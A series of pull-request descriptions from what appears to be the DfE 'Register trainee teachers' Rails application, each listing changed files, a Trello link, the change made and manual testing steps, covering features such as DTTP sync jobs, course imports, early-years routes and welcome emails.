spec/services/trainees/create_from_apply_spec.rb

https://trello.com/c/Dhw51PSS/1654-m-add-course-details-to-route-indicator
* updated `RouteIndicator` component to show course details for apply trainees
* New column `course_code` added to `Trainee`
* `Trainees::CreateFromApply` updated to save `course_code` on `Trainee`

[1654] Course details added to route indicator for apply trainees

---

app/forms/course_details_form.rb
app/forms/validate_publish_course_form.rb
app/services/progress_service.rb
spec/services/progress_service_spec.rb

- https://trello.com/c/Lcyb0sWU/1689-review-progress-tags-should-be-limited-to-registration-data-from-apply-sections
- Only render the review label for validator objects which respond to `apply_application`
- Internally, we'll just delegate this back to the trainee but declare the delegation on validators which could pre-populated from apply data
In the console do:
```ruby
require Rails.root.join("spec/support/api_stubs/apply_api.rb")
app = create(:apply_application)
trainee = create(:trainee, :school_direct_salaried, apply_application: app)
```
- Visit the `/review-draft` page and assert only the sections under `Registration data from apply` have the review label

[1689] Fix review status tag logic

---

app/lib/dttp/params/placement_assignment.rb
spec/lib/dttp/params/placement_assignment_spec.rb

https://trello.com/c/3qYP5hTv/1698-bug-adding-a-new-trainee-doesnt-update-the-agerange
https://sentry.io/organizations/dfe-bat/issues/2198667894/?environment=production&project=5552118&query=is%3Aunresolved
We changed to saving the course age range as two separate fields on trainee. However, we were still sending the value from the old `age_range` column to DTTP (which was nil for all new trainees).

[1698] Send age range to DTTP

---

Dockerfile
app/forms/validate_publish_course_form.rb
app/models/trainee.rb
app/services/trainees/create_timeline_events.rb
config/locales/en.yml
db/migrate/20210107103656_change_trainee_age_range_to_enum_type.rb
db/migrate/20210517112710_remove_age_range_from_trainees.rb
db/schema.rb
spec/components/pages/trainees/check_details/view_preview.rb
spec/components/trainees/confirmation/course_details/view_preview.rb
spec/components/trainees/confirmation/course_details/view_spec.rb
spec/components/trainees/confirmation/schools/view_preview.rb

https://trello.com/c/avypTNRm/1700-s-remove-trainee-agerange-column
- Remove `age_range` column from trainees table
- Update `Trainees::CreateTimelineEvents` and `ValidatePublishCourseForm`  to use `course_min_age` and `course_max_age` instead of `age_range`
- Update `schema.rb` to include the missing create table statement for "data_migrations" (this could be the reason why the data migrations didn't work initially, although the table gets created automatically if it doesn't exist).
- Update `Dockerfile` to use `rails db:migrate:with_data` instead of `rails db:migrate:ignore_concurrent_migration_exceptions data:migrate` (recommended by gem authors, also not sure why `ignore_concurrent_migration_exceptions` was used as it doesn't appear to do anything)

[1700] Remove trainee age range column

---

db/migrate/20210107103656_change_trainee_age_range_to_enum_type.rb

- https://github.com/DFE-Digital/register-trainee-teachers/pull/885/files#diff-dc82cc784551ae868610d3ebf46552f8d61217a32f76371a9736882c52461279L5
- Cast with `USING age_range::integer` otherwise migrations bork when running them from scratch
```ruby
== 20210107103656 ChangeTraineeAgeRangeToEnumType: migrating ==================
-- change_column(:trainees, :age_range, :integer)
rails aborted!
StandardError: An error has occurred, this and all later migrations canceled:
PG::DatatypeMismatch: ERROR:  column "age_range" cannot be cast automatically to type integer
HINT:  You might need to specify "USING age_range::integer".
/Users/david/Contracting/dfe/register-trainee-teachers/db/migrate/20210107103656_change_trainee_age_range_to_enum_type.rb:5:in `up'
Caused by: …
```

Fix ChangeTraineeAgeRangeToEnumType migration

---

app/components/trainees/confirmation/degrees/view.rb
app/models/degree.rb
app/views/trainees/degrees/_non_uk_degree_form.html.erb
app/views/trainees/degrees/_uk_degree_form.html.erb

https://trello.com/c/ohAtYkF4/1710-s-update-degree-pages-and-summary-cards
* Different H1s for uk/non-uk degree 
* Rearrange form elements to match prototype
* Rerrange rows on degree confirmation page
* Reorder validations to reflect changes
Add a uk and non uk degree in degree section

[1710] Update degree pages and summary cards

---

app/services/teacher_training_api/import_course.rb
app/services/teacher_training_api/retrieve_courses.rb
spec/services/teacher_training_api/import_course_spec.rb
spec/services/teacher_training_api/retrieve_courses_spec.rb

https://trello.com/c/ZPAa7LTv/1712-l-publish-courses-course-list-needs-to-be-correct
- Update the URL for importing courses to include the sort query param as this affects the results returned by the API (appears to be a bug since sorting shouldn't affect the results in this way).
- Add another guard clause to ignore courses that don't have a valid age range
Before adding the sort query param we go about 9,500 courses - now we get 11,769.
- Change the code of an existing provider to "2AT"
- Run the following import code:
```ruby
request_uri = nil
loop do
puts request_uri
payload = TeacherTrainingApi::RetrieveCourses.call(request_uri: request_uri)
payload[:data].each do |course_data|
TeacherTrainingApi::ImportCourse.call(course_data: course_data, provider_data: payload[:included])
end
if …
```

[1712] Publish courses list needs to be correct

---

app/components/cancel_link/view.html.erb
app/components/cancel_link/view.rb
app/components/flash_banner/view.rb
app/components/trainees/confirmation/training_details/view.html.erb
app/controllers/trainees/confirm_details_controller.rb
app/views/layouts/application.html.erb
app/views/trainees/check_details/show.html.erb
app/views/trainees/contact_details/edit.html.erb
app/views/trainees/course_details/edit.html.erb
app/views/trainees/employing_schools/index.html.erb
app/views/trainees/lead_schools/index.html.erb
app/views/trainees/personal_details/edit.html.erb
config/locales/en.yml
spec/components/cancel_link/view_spec.rb
spec/components/flash_banner/view_preview.rb
spec/components/flash_banner/view_spec.rb
spec/factories/trainees.rb
spec/features/trainees/degrees/delete_degree_spec.rb

- Remove cancel links from form sections in draft mode (apply draft too)
- Degrees confirm page heading needs to match prototype
- Remove flash message when adding a degree
- Summary card labels on training details confirm page need to match prototype
- Full stop needed in route type inset message on review-draft and check-details
- Summary components in check-details should match order in prototype
- Review and test the scenarios above

[1714] Provider led snags

---

app/helpers/course_details_helper.rb
app/views/trainees/publish_course_details/edit.html.erb
config/locales/en.yml
spec/features/trainees/edit_publish_course_details_spec.rb
spec/support/page_objects/trainees/publish_course_details.rb

- Toggle the `provider_led_postgrad` flag locally, run the sample data and create a provider-led trainee. 
- Head to the course details section and assert the hint is shown below the heading

[1711] Add route message to publish courses selection

---

app/components/review_draft/draft/view.html.erb
spec/components/review_draft/draft/view_spec.rb
spec/views/trainees/review_draft/show.html.erb_spec.rb

https://trello.com/c/ShYBYxRp/1724-s-remove-placement-details-sections-for-provider-led-draft-page
- Remove "Placement details" section - the work hasn't been done yet

[1724] Hide "Placement details" section from review draft page (not ready)

---

app/forms/degree_form.rb

https://trello.com/c/WERg6gR7/1746-cannot-add-a-new-degree-for-non-draft-trainees
- Add `to_param` to `DegreeForm` so that rails route helper can compute the URL [this is where `to_param` gets called](https://github.com/rails/rails/blob/main/actionpack/lib/action_dispatch/routing/route_set.rb#L233)
- Select a non-draft trainee
- Add new degree
- Confirm page should render without any exceptions thrown

[1746] Bug fix - adding new degrees to non-draft trainee

---

app/lib/dttp/params/contact.rb
spec/lib/dttp/params/contact_spec.rb

https://trello.com/c/AgkmJjaj/1761-no-disabilities-being-sent-to-dttp-as-lots-of-disabilities
- Update `Dttp::Params::Contact` to use the correct DTTP key for no disability.
The key was changed from `:not_disabled` to `:no_disability` a few months back, and because the code wasn't updated to reflect the new key, the guard clause failed leading to the code that eventually picks `Diversities::MULTIPLE_DISABILITIES`.

[1761] Bug fix - wrong DTTP ID sent for no disability

---

app/components/feedback_link/view.html.erb
app/components/feedback_link/view.rb
app/views/trainees/outcome_details/recommended.html.erb
app/views/trn_submissions/show.html.erb
config/settings.yml
config/settings/development.yml
config/settings/production.yml
config/settings/qa.yml
config/settings/review.yml
config/settings/staging.yml
spec/components/feedback_link/view_preview.rb
spec/components/feedback_link/view_spec.rb
spec/features/trainees/recommending_for_qts_spec.rb
spec/features/trainees/submit_for_trn_spec.rb
spec/support/features/page_helpers.rb
spec/support/page_objects/trainees/recommended_for_qts.rb

- [This trello ticket](https://trello.com/c/R8ITYv2V/1707-s-updates-to-our-2-submitted-pages-to-support-survey)
- Changed the `FeedbackLink::View` component to support the new button and dynamic text and opens on new tab
- Changed each of the `feedback_url`'s in the Settings for Prod, QA, dev, staging
- Updated the entire page to fit the current designs in the prototype
- Fire up your rails server `rails s`
- Navigate to a trainee *who is submitted for trn*
- Use that trainee hash and direct to `https://localhost:5000/trn_submissions/#{trainee_hash}`
- Navigate to a trainee *who is recommended for qts*
- Use that trainee hash and direct to `https://localhost:5000/trainees/#{trainee_hash}/outcome-details/recommended`
- Both of these pages will display the feedback component and will be up …

[1707] Update TRN submission + recommended for award pages

---

app/components/cancel_link/view.html.erb
app/components/trainees/confirmation/course_details/view.html.erb
app/components/trainees/confirmation/course_details/view.rb
app/forms/confirm_publish_course_form.rb
app/forms/course_details_form.rb
app/views/trainees/confirm_publish_course/edit.html.erb
config/locales/en.yml
spec/components/trainees/confirmation/course_details/view_spec.rb
spec/components/trainees/sections/view_spec.rb
spec/features/trainees/submit_for_trn_spec.rb

- https://trello.com/c/eMZwfzbp/1713-s-publish-courses-allow-courses-to-be-changed-from-confirmation-component
- Allow courses to be changed from confirmation components in both draft and non draft workflows
- Handle stashing/undoing behaviour

[1713] Allow courses to be changed from confirmation components

---

app/jobs/retrieve_award_job.rb
app/jobs/retrieve_trn_job.rb
jest.config.js
spec/jobs/retrieve_award_job_spec.rb
spec/jobs/retrieve_trn_job_spec.rb

We have two jobs - `RetrieveTrnJob` and `RetrieveAwardJob`, that poll DTTP for data and if they don't receive it re-enqueue themselves. After a timeout period (stored in settings and currently 4 days), they stop polling and notify us of failure on Slack.
Generally we would want to investigate and then probably set the polling running again to pick up the value when it arrives. The way the jobs were written this wasn't possible as the job was being run > 4 days after it was originally submitted so it immediately cancelled itself and notified again on Slack.
* Pass in a `timeout_after` date as an argument to allow us to specify a date that is different than the default in situations as described above.
* Update the `perform_with_default_delay` method to set the date using the existing logic …

[1744] Retrieve(Trn|Award)Job can be re-enqueued after polling timeout

---

app/components/trainees/sort_links/style.scss

Remove text-underline which is expected only on the links instead of "Sort By" prefix
Remove `   @include govuk-link-common;` from `.app-sort-links`
"Sort By:" is rendered without an underline.

[1759] Remove underline on sort links prefix text

---

app/jobs/dttp/check_consistency_job.rb
app/jobs/run_consistency_checks_job.rb
config/settings.yml
config/sidekiq_cron_schedule.yml
spec/jobs/run_consistency_checks_job_spec.rb

- [This trello ticket](https://trello.com/c/fuH0ByWq/1540-s-enable-consistency-check)
- Scheduled the `RunConsistencyChecksJob` to run at 2am nightly
- It will exit early if the feature flag is false
- It will exit early if there arent any `ConsistencyCheck` objects
- Added tests to support both the above
- Run `rspec spec/jobs/run_consistency_checks_job_spec.rb`
- OR
- Follow [these instructions](https://github.com/DFE-Digital/register-trainee-teachers/pull/723) and perform the job early from the command line.

[1540] Consistency Checks Scheduled

---

config/settings/production.yml

- [This trello ticket](https://trello.com/c/7kVGxccT/1750-reinstate-the-satisfaction-survey-link)
- Flipped the feature flag from `false` to `true` in `production.yml`
- Updated the link to the new google form
- Start up your rails server using `rails s`
- Find the feedback link, and click on it. It should take you to the new updated link

[1750] Flipped feature flag for feedback link and changed to new link

---

app/controllers/trainees_controller.rb
app/services/exports/trainee_search_data.rb
spec/services/exports/trainee_search_data_spec.rb

https://trello.com/c/Ak6B5dNc/1547-s-show-provider-name-to-administrators
- Add option to `Exports::TraineeSearchData` to include provider data
- Update `TraineesController` to enable option if user is system admin
- Log in as system admin
- Visit trainees page
- Export CSV
- Last column should have provider name
- Log in as non-system admin
- Export CSV again
- It should not have a column with provider name

[1547] Show provider name to administrators in CSV export

---

app/jobs/dttp/check_consistency_job.rb

We run a check against DTTP. When it fails we post a link to Slack that should take the user to the trainee record in Register. It does now.
Fix the link format in the slack alert.
It was:
`/trainees.<id>`
It is now:
`/trainees/<id>`
I've just fixed the link. There aren't any specs for this worker but we're going to have to change how this works as I think they'll always fail after the state updates at the DTTP end from DQT so we can add them for the new behaviour we add. Let's let them run for a few more days to confirm as we manually ran all of these yesterday to start the process off.
I think they will work as is and catch the issues we're looking for but it looks like we'll get false alarms too.

[1804] Fix consistency alert link

---

app/views/personas/index.html.erb
config/locales/en.yml

`Register trainee teacher` vs `Register trainee teachers`
:shipit:

[xxxx] Register trainee teachers

---

app/components/trainees/confirmation/course_details/view.html.erb
app/components/trainees/confirmation/course_details/view.rb
config/locales/en.yml
spec/components/trainees/confirmation/course_details/view_spec.rb

https://trello.com/c/ItUkrYxQ/1807-bug-a-change-link-in-course-details-leads-to-missing-translation-page
- Update `Trainees::Confirmation::CourseDetails::View` to only show course details information if the trainee's provider has available courses
- Create an AO trainee and fill in the course details
- Then the confirm page should not display the row titled "Course details"
- Create an Provider-led trainee and choose a course
- Then the confirm page should display the row titled "Course details"

[1807] Hide course details row if there are no published courses

---

app/forms/confirm_publish_course_form.rb
app/models/trainee.rb
spec/factories/trainees.rb
spec/forms/confirm_publish_course_form_spec.rb

- []()
- When the `ConfirmPublishCours` form is saved, we check that a trainee has multiple subjects saved to their name. If they do, those subjects are cleared
- Rails server `rails s`
- Create a trainee on the assessment only route
- Go to the `Course Details` section
- Complete it, but make sure to include multiple subjects (ie `Religious Education with Mathematics and French`)
- Save the form and go back to the trainee record
- Change their route to `Provider-led(postgrad)`
- Go back to the `Course Details` section
- Change the course (not the subject) to a valid publish course
- The extra subjects (which were `with Mathematics and French`) do not persist

[1802] Changing to publish course deletes surplus subjects from trainee

---

app/forms/personal_details_form.rb
spec/features/form_sections/personal_and_education_details/edit_personal_details_spec.rb

- [This bug ticket](https://trello.com/c/sEoHux0Z/1781-code-checking-for-free-typed-autocomplete-entries-doesnt-check-caselessly)
- Freetext responses of nationalities stored in raw value placeholders are cross-referenced to ensure their validity (ie, a freetext response of `france` is still valid, but was throwing the error of invalid response before). If they are valid, they are used. 
- Rails console `rails c`
- Direct yourself to any draft trainee
- Click on their personal details
- Go to their nationality section. 
- Click `Other`
- From the dropdown, type in `france` but DO NOT click the dropdown selection. 
- Instead, click `escape` to escape out of the selection process
- When you submit, the value is deemed valid.

[1781] Freetext autocomplete entries checked if valid

---

app/components/trainee_status_card/view.rb
app/components/trainees/filters/view.rb
app/services/exports/trainee_search_data.rb
config/locales/en.yml
spec/components/trainee_status_card/view_spec.rb
spec/services/exports/trainee_search_data_spec.rb

https://trello.com/c/5GeWBUUn/1803-inconsistent-trainee-states-in-export
- Update `Exports::TraineeSearchData` to render trainee states in humane readable format in CSV export
- Visit `/trainees`
- Export CSV
- Verify that all the various states are human readable and not converted symbols which is what it was before

[1803] Make all trainee states human readable in CSV export

---

Gemfile
Gemfile.lock
app/controllers/sessions_controller.rb
app/mailers/welcome_email_mailer.rb
app/services/send_welcome_email_service.rb
config/initializers/mailers.rb
config/settings.yml
db/migrate/20210602105639_add_welcome_email_sent_at_to_users.rb
db/schema.rb
spec/controllers/sessions_controller_spec.rb
spec/factories/users.rb
spec/mailers/welcome_email_mailer_spec.rb
spec/services/send_welcome_email_service_spec.rb

https://trello.com/c/wt7e8oNu/1875-enable-notifications-in-register-so-we-can-send-a-welcome-email
* New mailer `WelcomeEmailMailer`
* New welcome email template created on notify service
* New service `SendWelcomeEmailService` gets called after successful login

[1875] Enable notifications in Register so we can send a welcome email

---

app/components/status_tag/view.rb
app/lib/training_route_manager.rb
app/models/trainee.rb
spec/components/application_record_card/view_spec.rb
spec/components/status_tag/view_preview.rb
spec/components/status_tag/view_spec.rb

https://trello.com/c/nqPJSuc6/1857-s-ey-eyts-status-tags
When any EY trainee is recommended for EYTS, the status tags should read **EYTS recommended** (not QTS recommended).
Similarly, when any EY trainees is awarded EYTS, the status tags should read **EYTS awarded** (not QTS awarded).
- View an early years trainee who has been recommended for EYTS
- Check that the status tag on the trainee list view and the trainee show page is **EYTS recommended** 
- View an assessment only trainee (or provider-led, or school direct) who has been recommended for QTS
- Check that the status tag on the trainee list view and the trainee show page is **QTS recommended**
- Repeat the above steps for an awarded trainee

[1857] EYTS status tags

---

config/sidekiq.yml

https://trello.com/c/wt7e8oNu/1875-enable-notifications-in-register-so-we-can-send-a-welcome-email
* `mailers` added to sidekiq queue.

[1875] mailer queue added to sidekiq

---

app/view_objects/system_admin/users_view.rb
spec/view_objects/system_admin/users_view_spec.rb

There are a number of users in DTTP with no email address. This is
causing the provider#show page to error as we don't handle it. These
users should not be imported into register without an email so don't
display them.
The operations team will review the other users and sync should update
them. There are currently 11.
* Filter out users without an email address from the view

[1899] Handle DTTP users with nil email

---

app/components/feedback_link/view.html.erb
app/components/trainees/confirmation/confirm_publish_course/view.rb
app/forms/confirm_publish_course_form.rb
app/models/course.rb
app/views/trainees/course_details/_additional_subjects.html.erb
app/views/trainees/degrees/_uk_degree_form.html.erb
app/views/trainees/outcome_details/recommended.html.erb
app/views/trainees/personal_details/_nationality_select_field.html.erb
app/views/trainees/publish_course_details/edit.html.erb
config/locales/en.yml
config/settings/review.yml
config/sidekiq_cron_schedule.yml
spec/components/trainees/confirmation/confirm_publish_course/view_preview.rb
spec/components/trainees/confirmation/confirm_publish_course/view_spec.rb
spec/factories/course_subjects.rb
spec/factories/courses.rb
spec/factories/trainees.rb
spec/features/form_sections/teacher_training_data/edit_publish_course_details_spec.rb
spec/forms/confirm_publish_course_form_spec.rb
spec/rails_helper.rb
spec/support/features/course_details_steps.rb

- https://trello.com/c/UOyfZ9WX/1825-store-course-subject-name-not-course-name
- When choosing a publish course, we should store the course's subjects instead of the course name as the subject
- Turns on the job to import subjects which will need to be run before the courses are imported as they look up the subjects from the subjects table (which needs to be populated)
- Configure view components for easier testing using `rendered_component` instead of the `alias_method :component, :page`
Before (using the course as a subject):
After (using the actual course subjects):
- Head to https://rtt-review-pr-940.herokuapp.com/trainees/3iAYR7zCBVFqZiwRt1wss4Qg/review-draft and click on the course details
- Choose course Course 1 (CEVH) (last option)
- Assert the course's subjects are shown under …

[1825] Store course subject(s) name not course name

---

config/initializers/training_routes.rb
config/locales/en.yml
config/settings.yml
config/settings/review.yml
spec/features/trainee_actions/creating_a_new_trainee_spec.rb
spec/models/trainee_spec.rb
spec/support/page_objects/trainees/new.rb

Adding all of the early years routes to the `What type of training` form. 
When you select one of the new routes, it now redirects to the correct form.
`Note:` Two routes have been renamed in this PR as detailed below. 
- All routes now redirect to the correct form
- Early years routes are switched on in the review app
- Rename "Early years (graduate employment based)" to "Early years (salaried)"
- Rename "Early years (graduate entry)" to "Early years (postgrad)"
- Add a new trainee 
- Check that choosing an early year route redirects to the correct form
- Repeat with the other early year routes

[1866] Add all routes to the "what type of training" form

---

spec/models/trainee_spec.rb

This spec shouldn't need to test ordering, only that the elements match.
Use `match_array` to disregard order.

[xxx] Use match_array to fix flakey spec

---

app/views/sign_in/new.html.erb

Before:
After:
- Visit /sign-in/user-not-found

[1906] Fix broken translation

---

app/views/trainees/employing_schools/_results.html.erb
app/views/trainees/lead_schools/_results.html.erb

https://trello.com/c/mBUxbYhP/1881-s-non-javascript-lead-school-search-the-or-is-weirdly-placed-is-it-using-the-formbuilder
For both lead schools and employing schools results partial
Formbuilder was being used but uses of gov css margin override classes was making it look weird and not like the prototype
css classes removed 
Turn js off and search for schools on lead schools edit and employing schools edit page

[1881] Fix markup on results pages

---

lib/tasks/govuk_lint.rake

Our ERB linter keeps breaking our translation files. This PR turns off auto correct to help prevent this from happening. 
- Pull down the code and run `bundle exec rake`
- Ensure that the erb files are not autocorrected.

[1910] Turn off auto correct on the erb linter

---

app/controllers/application_controller.rb
spec/controllers/application_controller_spec.rb

https://trello.com/c/tqL5XYlK/1912-register-signin-email-comparison-is-case-sensitive
We already downcase emails that are returned from dfe sign in, but there
are users in production whose emails in the register db are not all
lowercase.
Lowercase emails when doing a find_by for current user
Tricky one to test, maybe go and edit an email manually in the review app db if you have the good fortune of having a dfe sign in account.

[1912] Make email check case insensitive when finding current user

---

spec/features/end_to_end/school_direct_salaried_journey_spec.rb
spec/features/end_to_end/school_direct_tuition_fee_journey_spec.rb
spec/support/features/lead_and_employing_school_steps.rb
spec/support/features/training_route_steps.rb
spec/support/page_objects/sections/schools_details.rb
spec/support/page_objects/trainees/review_draft.rb

- [This trello ticket](https://trello.com/c/ZTd8DVSm/1891-m-end-to-end-feature-spec-for-each-school-route)
- End to end feature specs for both `tuition-fee` and `salaried` `school-direct` routes
- Run `rspec spec/features/end_to_end/school_direct_salaried_journey_spec.rb `
- Run `rspec spec/features/end_to_end/school_direct_tuition_fee_journey_spec.rb `

[1891] End to end feature spec for each school route

---

terraform/modules/paas/main.tf
terraform/modules/paas/variables.tf

Populate sample data for the review apps on PaaS.
Run rake tasks to populate the review app's database with seed data.
Will run the below command on review app start up
```
bundle exec rake db:schema:load db:seed example_data:generate
```

Run seed data script for review apps

---

app/jobs/dttp/sync_schools_job.rb
app/jobs/dttp/sync_users_job.rb
app/lib/dttp/parsers/account.rb
app/lib/dttp/sync_pattern.rb
app/models/dttp/school.rb
app/services/dttp/retrieve_providers.rb
app/services/dttp/retrieve_schools.rb
app/services/dttp/retrieve_users.rb
config/sidekiq_cron_schedule.yml
db/migrate/20210603171313_create_dttp_schools.rb
db/schema.rb
spec/factories/dttp/schools.rb
spec/jobs/dttp/sync_schools_job_spec.rb
spec/models/dttp/school_spec.rb
spec/services/dttp/retrieve_providers_spec.rb
spec/services/dttp/retrieve_schools_spec.rb
spec/services/dttp/retrieve_users_spec.rb
spec/support/api_stubs/dttp/school.rb
spec/support/shared_examples/sync_pattern.rb

Like https://github.com/DFE-Digital/register-trainee-teachers/pull/752 and https://github.com/DFE-Digital/register-trainee-teachers/pull/752, add a sync job to fetch dttp schools into a lookup table.
1. `Dttp::SyncSchoolsJob` fetches Schools in batches, and runs an upsert_all to insert/update the records to Dttp::School
2. Refactor retreive service objects to reduce code duplication.
1. Ensure sidekiq and rails are running
2. Visit https://localhost:5000/sidekiq/cron/import_schools_from_dttp, and click "Enqueue Now"
3. As of this writing 50640 records should be matched and created in dttp_schools

[1890] Add sync job for dttp schools

---

app/models/school.rb
app/services/school_search.rb
spec/services/school_search_spec.rb

Ensure alphabetical search ordering based on name when searching schools in the picker. 
1. Add a order clause to the `SchoolSearch` service.
2. Add `order_within_rank` to the pg_search scope to ensure consistency.

[1914] Ensure school search results are ordered by name

---

app/components/application_record_card/view.rb
app/lib/training_route_manager.rb
app/models/trainee.rb
config/locales/en.yml
spec/components/application_record_card/view_spec.rb

https://trello.com/c/iEYYs4fs/1850-s-ey-show-early-years-teaching-in-place-of-subject-on-trainee-list
If a non-EY trainee has not recorded a subject, we say "No subject provided". However, a EY trainee never chooses a subject so it's always empty. 
This PR changes the default text in the trainee list view to say "Early years teaching" for EY trainees.
- Create an Early years trainee
- Go to the trainee list
- Check that the new trainee's card says "Early years teaching", not "No subject provided"
- Create a non-Early years trainee (or choose an existing one with no subject added)
- Go to the trainee list
- Check that this trainee's card continues to say "No subject provided" as before

[1850] Render 'Early years teaching' instead of 'No subject provided'

---

app/components/school_result_notice/view.html.erb
app/components/school_result_notice/view.rb
app/views/trainees/employing_schools/_results.html.erb
app/views/trainees/lead_schools/_results.html.erb
config/locales/en.yml
spec/components/school_result_notice/view_preview.rb
spec/components/school_result_notice/view_spec.rb

- https://trello.com/c/Umvfi7n8/1882-s-the-n-more-schools-match-your-search-bit-isnt-there-on-the-results-page
- If a search term returns more than 15 schools, we render an inset text to help the user narrow down their search

[1882] Add component for rendering school result text

---

app/helpers/task_list_helper.rb
config/locales/en.yml
spec/components/review_draft/apply_draft/view_spec.rb
spec/components/review_draft/draft/view_spec.rb

- https://trello.com/c/WQbHBsj2/1898-bug-school-direct-tuition-fee-trainees-have-a-lead-and-employing-schools-section-even-though-they-dont-have-employing-schools
- Render the correct school details section title based on the school route type
- Choose a trainee on the school direct (tuition fee) route and assert the section title is "Lead school"
- Choose a trainee on the school direct (salaried) route and assert the section title is "Schools"

[1898] Render correct title depending on school route type

---

app/components/application_record_card/view.rb
app/components/trainees/confirmation/course_details/view.rb
app/forms/course_details_form.rb
app/lib/training_route_manager.rb
app/models/trainee.rb
app/views/trainees/course_details/edit.html.erb
app/views/trainees/employing_schools/edit.html.erb
app/views/trainees/lead_schools/edit.html.erb
spec/lib/training_route_manager_spec.rb

https://trello.com/c/77dx3rGp/1851-s-ey-remove-subject-and-age-range-from-course-details-form
* Updated course details form to hide subject and age range for early years routes

[1851] EY - Remove subject and age range from course details form

---

app/components/badges/view.html.erb
app/components/badges/view.rb
app/components/trainee_status_card/view.html.erb
app/components/trainee_status_card/view.rb
app/controllers/pages_controller.rb
app/view_objects/home_view.rb
app/views/pages/_badges.html.erb
config/initializers/training_routes.rb
config/locales/en.yml
spec/components/badges/view_preview.rb
spec/components/badges/view_spec.rb
spec/components/trainee_status_card/view_preview.rb
spec/components/trainee_status_card/view_spec.rb
spec/view_objects/home_view_spec.rb

https://trello.com/c/4xPw1rDm/1860-m-ey-home-page-squares-to-distinguish-between-eyts-and-qts
- Add a new badges component to determine which award states to show on the home page.
- Just perform one db call to get the counts instead of one for each state
Have a gander at `/view_components` on the review app 
_or look at the screenshots below if it happens to be broken_
**QTS only trainees**
**Mixture of trainees**
**Only early years routes**

[1860] Home page squares with EYTS, QTS and generic states

---

app/views/trainees/outcome_dates/edit.html.erb
config/locales/en.yml
spec/features/trainee_actions/recording_training_outcome_spec.rb

The title on the outcome date edit page, for early year trainees is being changed. 
The title on the same page for non early year trainees is also being updated.  
https://register-pr-978.london.cloudapps.digital/
- Navigate to a non early year trainee with a status of `TRN received`, click the green `Recommend trainee for QTS` button and check that the page title and heading now says `When did they meet the QTS standards?`
- Navigate to an early year trainee with a status of `TRN received`, click the green `Recommend trainee for QTS` button and check that the page title and heading now says `When did they meet the EYTS standards?`

[1855] Change title on outcome date edit page for early years trainees

---

app/components/trainees/record_actions/view.html.erb
app/components/trainees/record_actions/view.rb
config/locales/en.yml
spec/views/trainees/show.html.erb_spec.rb

The text on the recommended for QTS button is being changed form `Recommend trainee for QTS` to `Recommend trainee for EYTS` for all early year routes.
- Navigate to a non early year trainee with a status of `TRN received` and ensure that the green button at the top still says `Recommend trainee for QTS`
- Navigate to a early year trainee with a status of `TRN received` and ensure that the green button at the top now says `Recommend trainee for EYTS`

[1854] Change Recommend for QTS button to say EYTS for early years

---

config/locales/en.yml

Updating the 4th bullet point on the signed out homepage to reflect early year routes.
- Navigate to the [signed out home page](https://register-pr-981.london.cloudapps.digital/)
- Check that the fourth bullet point includes early years and matches the prototype.

[1863] Update 4th bullet point on signed out homepage

---

app/services/trainees/create_timeline_events.rb
config/locales/en.yml

https://trello.com/c/dyEZOnTS/1935-bug-course-subject-2-3-not-displayed-in-timeline
- Add `subject_two` anf `subject_three` to `Trainees::CreateTimelineEvents::FIELDS`

[1935] Fix missing course subject 2 & 3 from timeline

---

lib/tasks/example_data.rake
spec/factories/trainees.rb
spec/features/form_sections/personal_and_education_details/degrees/editing_degree_spec.rb
spec/models/trainee/state_transitions_spec.rb

For discussion re direction of example data.
- Created a completely new rake task for testing `rake example_data_new:generate`
- This is based on having minimal viable valid `FactoryBot` traits and using them.
Truncate your local DB and run `rake example_data_new:generate`.
Check out the created trainees.

[1979] Add all routes to example data rake

---

app/components/trainees/record_details/view.html.erb
app/components/trainees/record_details/view.rb
app/models/trainee.rb
config/locales/en.yml
db/data/20210607164459_add_awarded_at_to_trainees.rb
db/data_schema.rb
db/migrate/20210607164204_add_awarded_at_to_trainees.rb
db/schema.rb
lib/tasks/example_data.rake
spec/components/trainees/record_details/view_preview.rb
spec/components/trainees/record_details/view_spec.rb
spec/factories/trainees.rb

https://trello.com/c/yO2sDcCi/1858-s-ey-trainee-show-page-show-correct-award-row-with-status-tag
**This PR:**
- Makes the changes to the view (see screenshots below)
- Adds a migration to add a new field to trainees `awarded_at`, which get updated as part of the state transition to `awarded`. This is similar to all our other fields `recommended_for_award_at` and `submitted_for_trn_at`.
- Adds a data migration to backfill all trainees `awarded_at` with the correct timestamp. This is pulled out of the audits table.
**Visual changes:**
For trainees who have been recommended for EYTS / QTS there is a new row in the trainee progress card on the trainee show page:
The label of the row is EYTS or QTS depending on the award they are receiving, and the detail should show the correct status tag and …

[1858] Show EYTS and QTS trainee progress row

---

app/controllers/trainees/confirm_publish_course_controller.rb
app/views/trainees/confirm_publish_course/edit.html.erb

- [This trello ticket](https://trello.com/c/13QTIZor/1928-s-fix-edit-details-for-this-trainee-link)
- The link that had a placeholder of `#` was changed to `edit_trainee_publish_course_details_path(@trainee)` which links back to the edit publish course details page
- Page tracker tracks the confirm publish course details page so dynamic back links track it
- Find a trainee on the Provider Led route who is assigned to a publish course
- Click on change the publish course
- Select a course and follow onto the next page
- Theres a link at the bottom of the page called `Edit details for this trainee only`
- Click that link. You will now be redirected to the course selection page

[1928] Fix edit link on course details page

---

app/components/trainees/school_details/view.rb
app/controllers/trainees/confirm_details_controller.rb
app/controllers/trainees/lead_schools_controller.rb
app/forms/schools/form_validator.rb
config/locales/en.yml
spec/features/form_sections/teacher_training_data/edit_schools_spec.rb
spec/forms/schools/form_validator_spec.rb
spec/support/page_objects/trainees/record.rb

- [This trello ticket](https://trello.com/c/CV72OmiO/1888-m-trainee-record-page-change-link-for-lead-school)
- I also fixed a bug where the `Schools::FormValidator` was not being used for the confirm page
- and that the `Schools::FormValidator` rehydrated the two forms with `new_attributes` from the `FormStore`
- Confirmation Controller uses the `Schools::FormValidator` for the schools form
- `Schools::FormValidator` uses form-store values as new attributes and merges them with the trainee
- Change link from the record page goes to the schools search page
- Create a trainee on the School Direct Tuition Fee AND/OR the School Direct Salaried route and complete them
- Submit the trainee for TRN
- On their record page, change either their lead and/or employing school. 
- You should be …

[1888] trainee record page change link for lead school

---

app/components/summary_card/style.scss
app/views/trainees/review_draft/show.html.erb
config/locales/en.yml

- https://trello.com/c/f5rQzGTW/1929-s-replace-review-and-submit-with-final-check
- https://trello.com/c/NjL0oeqK/1930-s-check-h2-margins
- https://trello.com/c/tiZZ3nUj/1931-s-change-page-title-to-record-submitted-on-trn-record-submission-page
- A couple of snags from the provider-led demo
- https://register-pr-980.london.cloudapps.digital/

[1929], [1930] and [1931] - A couple of small provider-led snags

---

spec/factories/schools.rb
spec/factories/subjects.rb

